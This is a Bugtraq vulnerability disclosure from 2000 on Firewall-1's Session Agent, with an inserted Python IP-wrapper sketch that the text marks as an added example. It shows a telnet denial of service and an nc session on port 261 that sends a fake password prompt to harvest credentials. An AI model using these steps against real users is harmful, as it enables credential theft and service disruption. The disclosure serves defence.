Bugtraq mailing list archives

Firewall-1 Session Agent, DOS and password thief


From: gregory duchemin <c3rb3r () HOTMAIL COM>
Date: Fri, 4 Aug 2000 22:04:55 GMT

hi,

After the great revelations at the Las Vegas Black Hat about many security
vulnerabilities in Firewall-1, I was looking at this little module I use in
my company, called "authentication session agent".
We use it all over the corporate network to allow only some privileged
users to go out to the Internet.
This agent is installed on the Windows 9.x/NT box and just listens on port
261 for a connection from a firewall module.
When a user wishes to surf the web or to use any other outside service, the
firewall intercepts the request and three-way handshakes with the agent to
get some authentication information: user + pass.

There are at least two vulnerabilities in the agent:

1- Denial of service: when a connection is already established with the
agent, no other connection can be carried anymore, leading to a denial of
service if one day some malicious users decide to type something like:

#telnet target 261

The user of the target couldn't get the requester asking him for his
password... too bad... no more authentication, no more outside connection.


2- More seriously, for compatibility reasons the agent shows a checkbox that
permits our user to send his password in cleartext, because firewall
modules 4.0 and below don't know how to do encryption.
It's not only possible to sniff this password on the network segment but,
much more interesting, it's really trivial to ask the user agent to give it
to us ;)

example:

#nc target 261

220 FW-1 fake session authentication
331 User:
-> he answers with his username
331 *FireWall-1 p4ssw0rd pleazzz:
-> if he's an idiot, he'll take that for a real FW prompt and you'll get
back his password; else just change the message ;)
200 User has now a clone, c3rb3r
230 OK

Note that this exploit is interactive: when you send 331 User:, it appears
straight away on the victim's screen, so you have to wait for his
answer.
It's even possible to use the session agent like a funny chat with a
Checkpoint logo in the top right ;) try it...

Solutions:
For the DoS, wait for Checkpoint's reply, but for the password weakness
always use encryption (if you have a firewall module 4.1, naturally)
and use the IP wrapper incorporated into the agent, which is not active by
default.
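As an added example (not code from the original post, nor Check Point's agent), a Python sketch of the two defensive points above: an IP wrapper that checks the peer against the configured firewall module addresses before the agent says anything, so a stranger never gets to show a fake prompt, plus an idle timeout so one silent connection cannot hold the agent's single slot forever. The port and the 220 banner code come from the message above; the firewall address 192.0.2.10 and the banner text are assumptions.

```python
import ipaddress
import socket

AGENT_PORT = 261  # port the Session Agent listens on, per the advisory


def peer_allowed(peer_ip, allowed_firewalls):
    """IP wrapper: True only if peer_ip is one of the firewall module addresses/networks."""
    ip = ipaddress.ip_address(peer_ip)
    return any(ip in ipaddress.ip_network(net, strict=False) for net in allowed_firewalls)


def handle_session(conn, peer_ip, allowed_firewalls, idle_timeout=10.0):
    """Serve one agent connection and return a status string for logging.

    The peer is checked BEFORE the 220 banner is sent, so an unauthorized
    host never reaches the point where it could drive prompts on the user's
    screen. A peer that stays silent is dropped after idle_timeout seconds
    instead of blocking every later connection (the DoS described above).
    """
    if not peer_allowed(peer_ip, allowed_firewalls):
        conn.close()
        return "rejected-unauthorized-peer"
    conn.settimeout(idle_timeout)
    try:
        conn.sendall(b"220 FW-1 Session Agent\r\n")  # banner text is assumed
        first_line = conn.recv(256)  # real challenge/response would continue here
        if not first_line:
            return "dropped-closed-peer"
        return "accepted"
    except socket.timeout:
        return "dropped-idle-peer"
    finally:
        conn.close()


def serve(bind_addr, allowed_firewalls):
    """Single-slot accept loop, like the agent; only the wrapper and timeout are new."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, AGENT_PORT))
        srv.listen(1)
        while True:
            conn, (peer_ip, _port) = srv.accept()
            print(peer_ip, handle_session(conn, peer_ip, allowed_firewalls))


if __name__ == "__main__":
    serve("0.0.0.0", ["192.0.2.10"])  # assumed firewall module address
```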

That was my small contribution to Checkpoint's black list.

Oops: agent 4.1 was tested on a Win95 box.


Have a nice day
Greg

===================================================
Gregory Duchemin // security engineer

NEUROCOM CANADA
1001 Bd Maisonneuve
Montreal Quebec
CANADA

